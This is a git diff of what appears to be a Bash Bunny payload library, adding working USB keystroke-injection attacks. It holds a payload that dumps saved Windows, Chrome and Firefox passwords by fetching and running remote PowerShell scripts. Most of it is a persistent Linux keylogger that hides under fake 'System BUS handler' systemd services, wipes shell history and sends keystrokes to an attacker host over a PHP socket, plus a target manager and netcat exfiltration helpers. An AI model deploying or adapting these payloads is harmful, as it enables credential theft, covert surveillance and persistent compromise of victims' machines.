# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
|
||||
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
|
||||
# Credits to these guys for their powershell scripts:
|
||||
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
|
||||
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
|
||||
|
||||
#script
|
||||
# Blue...............Running Script
|
||||
# Purple.............Got Browser Creds
|
||||
|
||||
|
||||
LED R 200
|
||||
LOOTDIR=/root/udisk/loot/BrowserCreds
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
LED B 200
|
||||
|
||||
# wait 6 seconds for the storage to popup
|
||||
Q DELAY 6000
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING POWERSHELL
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Dump Credential Vault (I.E./Edge)
|
||||
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
|
||||
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
|
||||
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
|
||||
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Dump Chrome Creds
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft UserURL\, Password -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt -width 250
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
|
||||
#Open 32bit powershell and Dump Firefox Creds
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING Out-File -FilePath \$BUNNY\\loot\\BrowserCreds\\DONE
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
sync
|
||||
LED R B 200
|
||||
|
||||
FILE="/root/udisk/loot/BrowserCreds/DONE"
|
||||
while [ ! -e $FILE ]; do sleep 1; done;
|
||||
sleep 1;
|
||||
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi
|
||||
@@ -1,27 +0,0 @@
|
||||
# BrowserCreds
|
||||
|
||||
* Author: illwill
|
||||
* Version: Version 0.1
|
||||
* Target: Windows
|
||||
|
||||
## Description
|
||||
|
||||
Dumps the stored plaintext Browser passwords from Windows boxes using
|
||||
Powershell HID attack, then stashes them in /root/udisk/loot/BrowserCreds/
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| White (blinking) | Setting up |
|
||||
| Blue (blinking) | Attack running |
|
||||
| Purple (blinking) | Dumping Browser Credentials |
|
||||
| Green (blinking) | Succeeded Dumping Browser Credentials |
|
||||
| Red (blinking) | Failed Dumping Browser Credentials |
|
||||
|
||||
## Discussion
|
||||
https://forums.hak5.org/index.php?/topic/40431-payload-browsercreds
|
||||
@@ -5,15 +5,14 @@
|
||||
# Version: 1.0
|
||||
# Category: Password Recovery
|
||||
# Target: Windows XP SP3+
|
||||
#
|
||||
#
|
||||
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
|
||||
# access to the admin panel.
|
||||
|
||||
# init
|
||||
LED R B
|
||||
LED SETUP
|
||||
|
||||
# need SWITCH_POSITION, so give it to me. please. thank you.
|
||||
source bunny_helpers.sh
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# set up the things to make it do stuff
|
||||
mkdir -p /root/udisk/BruteBunny/loot
|
||||
@@ -28,12 +27,12 @@ sync;sleep 1;sync
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
# wait for storage
|
||||
LED R G B 100
|
||||
LED STAGE1
|
||||
QUACK DELAY 6000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
# unleash the brute bunny
|
||||
LED B 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
|
||||
QUACK ENTER
|
||||
sleep 10
|
||||
@@ -41,4 +40,4 @@ sleep 10
|
||||
# sync the stuff
|
||||
sync;sleep 1;sync
|
||||
|
||||
LED G
|
||||
LED FINISH
|
||||
|
||||
62
payloads/library/credentials/BunnyLogger/README.md
Normal file
62
payloads/library/credentials/BunnyLogger/README.md
Normal file
@@ -0,0 +1,62 @@
|
||||
## About:
|
||||
* Title: BunnyLogger
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Detailed key logs.
|
||||
* Persistent
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Workflow:
|
||||
* Encoding payload and injecting on target's system.
|
||||
* Checks whether internet is connected to the target system.
|
||||
* If internet is connected then it sends raw keystrokes to attacker.
|
||||
* Attacker processes raw keystrokes.
|
||||
|
||||
### Changes to be made in payload.sh:
|
||||
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
|
||||
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| xinput | /tools/ |
|
||||
|
||||
### Usage:
|
||||
1. Encode payload.txt and inject into target's system.
|
||||
2. Start netcat listner on attacking system:
|
||||
|
||||
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
|
||||
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
|
||||
3. Process raw keystrokes using BunnyLoggerDecoder utility:
|
||||
```
|
||||
./bunnyLoggerDecoder
|
||||
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
|
||||
|
||||
Usage:
|
||||
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
|
||||
|
||||
Options:
|
||||
-f Specify Log file.
|
||||
-m Select Mode(normal|informative)
|
||||
-o Specify Output file.
|
||||
-h For this banner.
|
||||
```
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
||||
50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder
Normal file
50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder
Normal file
@@ -0,0 +1,50 @@
|
||||
usage () {
|
||||
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
|
||||
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
|
||||
echo -e "\nOptions:"
|
||||
echo -e "-f\tSpecify Log file."
|
||||
echo -e "-m\tSelect Mode(normal|informative)"
|
||||
echo -e "-o\tSpecify Output file."
|
||||
echo -e "-h\tFor this banner."
|
||||
}
|
||||
while getopts o:m:f:h: flag
|
||||
do
|
||||
case "${flag}" in
|
||||
o) output=$OPTARG ;;
|
||||
m) mode=$OPTARG ;;
|
||||
f) filename=$OPTARG ;;
|
||||
h) help=$OPTARG ;;
|
||||
*)
|
||||
usage
|
||||
exit 1
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$output" ] && [ -z "$filename" ]; then
|
||||
usage
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$filename" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$output" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ -z "$mode" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
|
||||
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "normal" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
|
||||
exit 1
|
||||
fi
|
||||
if [ "$mode" == "informative" ] ; then
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
|
||||
exit 1
|
||||
fi
|
||||
24
payloads/library/credentials/BunnyLogger/payload.sh
Normal file
24
payloads/library/credentials/BunnyLogger/payload.sh
Normal file
@@ -0,0 +1,24 @@
|
||||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/tools/xinput /var/tmp/.system/
|
||||
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/sys
|
||||
chmod +x /var/tmp/.system/xinput
|
||||
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||
56
payloads/library/credentials/BunnyLogger/payload.txt
Normal file
56
payloads/library/credentials/BunnyLogger/payload.txt
Normal file
@@ -0,0 +1,56 @@
|
||||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
BIN
payloads/library/credentials/BunnyLogger/xinput
Normal file
BIN
payloads/library/credentials/BunnyLogger/xinput
Normal file
Binary file not shown.
39
payloads/library/credentials/BunnyLogger2.0/README.md
Normal file
39
payloads/library/credentials/BunnyLogger2.0/README.md
Normal file
@@ -0,0 +1,39 @@
|
||||
## About:
|
||||
* Title: BunnyLogger 2.0
|
||||
* Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
|
||||
|
||||
### Features:
|
||||
* Live keystroke capturing.
|
||||
* Stored Keystroke capturing.
|
||||
* Bunny Logger Manager: Interactive TUI Dashboard.
|
||||
* Detailed key logs.
|
||||
* Persistent.
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Directory Structure of payload components:
|
||||
|
||||
| FileName | Directory |
|
||||
| -------------- | ------------------------------ |
|
||||
| payload.txt | /payload/switch1/ |
|
||||
| payload.sh | /payload/ |
|
||||
| requirements/* | /payloads/library/bunnyLogger2 |
|
||||
|
||||
### LED Status:
|
||||
|
||||
* `LED SETUP` : MAGENTA
|
||||
* `LED ATTACK` : YELLOW
|
||||
* `LED FINISH` : GREEN
|
||||
|
||||
### Usage:
|
||||
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
|
||||
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
||||
7
payloads/library/credentials/BunnyLogger2.0/install.sh
Normal file
7
payloads/library/credentials/BunnyLogger2.0/install.sh
Normal file
@@ -0,0 +1,7 @@
|
||||
#!/bin/bash
|
||||
loc=$HOME/.config/bunnyLogger
|
||||
mkdir $loc
|
||||
cp requirements/payload.sh $loc
|
||||
touch $loc/bunnyLogger.db
|
||||
chmod +x requirements/bunnyLoggerMgr
|
||||
sudo cp requirements/bunnyLoggerMgr /usr/local/bin/
|
||||
53
payloads/library/credentials/BunnyLogger2.0/payload.txt
Normal file
53
payloads/library/credentials/BunnyLogger2.0/payload.txt
Normal file
@@ -0,0 +1,53 @@
|
||||
# Title: BunnyLogger
|
||||
# Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
||||
@@ -0,0 +1,191 @@
|
||||
#!/bin/bash
|
||||
allowAbort=true;
|
||||
myInterruptHandler()
|
||||
{
|
||||
if $allowAbort; then
|
||||
echo
|
||||
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
|
||||
fi;
|
||||
}
|
||||
trap myInterruptHandler SIGINT
|
||||
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
|
||||
echo
|
||||
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
|
||||
echo
|
||||
read -p "Enter your choice: " ch
|
||||
create(){
|
||||
read -p "Enter Target's name(without whitespaces): " name
|
||||
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
|
||||
exit 1
|
||||
fi
|
||||
read -p "Enter Servers IP: " ip
|
||||
read -p "Enter Unique Port Number(1500-65535): " port
|
||||
read -p "Enter another Unique Port Number(1500-65535): " secPort
|
||||
if [ "$port" == "$secPort" ]; then
|
||||
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
|
||||
exit 1
|
||||
fi
|
||||
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
max=65535
|
||||
min=1500
|
||||
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
|
||||
read -p "Specify directory for output: " dir
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
cp -r ~/.config/bunnyLogger/payload.sh $dir
|
||||
fi
|
||||
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
|
||||
sed -i -e "s/4444/$port/g" $dir/payload.sh
|
||||
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
|
||||
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
}
|
||||
list(){
|
||||
|
||||
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
|
||||
}
|
||||
remove(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter name of target to remove: " rmv
|
||||
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
|
||||
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
|
||||
fi
|
||||
}
|
||||
update(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Choose target number: " cho
|
||||
read -p "You want to update (ip|portOne|portTwo): " ent
|
||||
if [ "$ent" = ip ]
|
||||
then
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
read -p "Enter new ip: " use
|
||||
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
|
||||
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
|
||||
exit
|
||||
fi
|
||||
elif [ "$ent" = portOne ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
elif [ "$ent" = portTwo ]
|
||||
then
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
read -p "Enter new Port number: " useP
|
||||
max=65535
|
||||
min=1500
|
||||
if (( $useP <= $max )) && (( $useP >= $min )); then
|
||||
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
|
||||
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
|
||||
fi
|
||||
}
|
||||
fetch(){
|
||||
echo
|
||||
list
|
||||
echo
|
||||
read -p "Enter Target number to connect: " cho
|
||||
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
|
||||
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
|
||||
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
|
||||
read typ
|
||||
case $typ in
|
||||
1)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
|
||||
nc -lvp $two > $dir/$filename.log
|
||||
fi
|
||||
;;
|
||||
2)
|
||||
read -p "Specify directory for output: " dir
|
||||
read -p "Enter filename to store logs: " filename
|
||||
if [ ! -d "$dir" ]; then
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
|
||||
exit 1
|
||||
else
|
||||
nc -lvp 1444 > $dir/$filename.log &
|
||||
nc -lvp $three
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
decode(){
|
||||
echo -e "1] Normal Decode \t2] Informative Decode"
|
||||
read -p "Enter your choice: " cho
|
||||
read -p "Enter path of file to decode: " path
|
||||
read -p "Enter path for decoded log: " out
|
||||
case $cho in
|
||||
1)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
|
||||
;;
|
||||
2)
|
||||
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
|
||||
;;
|
||||
esac
|
||||
}
|
||||
case $ch in
|
||||
1)
|
||||
fetch
|
||||
;;
|
||||
2)
|
||||
create
|
||||
;;
|
||||
3)
|
||||
list
|
||||
;;
|
||||
4)
|
||||
update
|
||||
;;
|
||||
5)
|
||||
remove
|
||||
;;
|
||||
6)
|
||||
decode
|
||||
;;
|
||||
*)
|
||||
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
|
||||
;;
|
||||
esac
|
||||
@@ -0,0 +1,41 @@
|
||||
#!/bin/bash
|
||||
transfer(){
|
||||
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
|
||||
cd /var/tmp/.system/logs/
|
||||
ls /var/tmp/.system/logs/ | sort
|
||||
echo
|
||||
echo -n "Enter filename to transfer: "
|
||||
read ch
|
||||
if [ -f $ch ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
|
||||
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
|
||||
else
|
||||
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
|
||||
fi
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
|
||||
fi
|
||||
}
|
||||
conti(){
|
||||
while :
|
||||
do
|
||||
echo
|
||||
echo -n "Would you like to transfer more files? [Y/N]: "
|
||||
read ch
|
||||
if [ "$ch" = y ] || [ "$ch" = Y ];
|
||||
then
|
||||
transfer
|
||||
elif [ "$ch" = N ] || [ "$ch" = n ];
|
||||
then
|
||||
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
|
||||
break
|
||||
else
|
||||
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
|
||||
fi
|
||||
done
|
||||
}
|
||||
transfer
|
||||
conti
|
||||
BIN
payloads/library/credentials/BunnyLogger2.0/requirements/nc
Normal file
BIN
payloads/library/credentials/BunnyLogger2.0/requirements/nc
Normal file
Binary file not shown.
@@ -0,0 +1,28 @@
|
||||
#!/bin/bash
|
||||
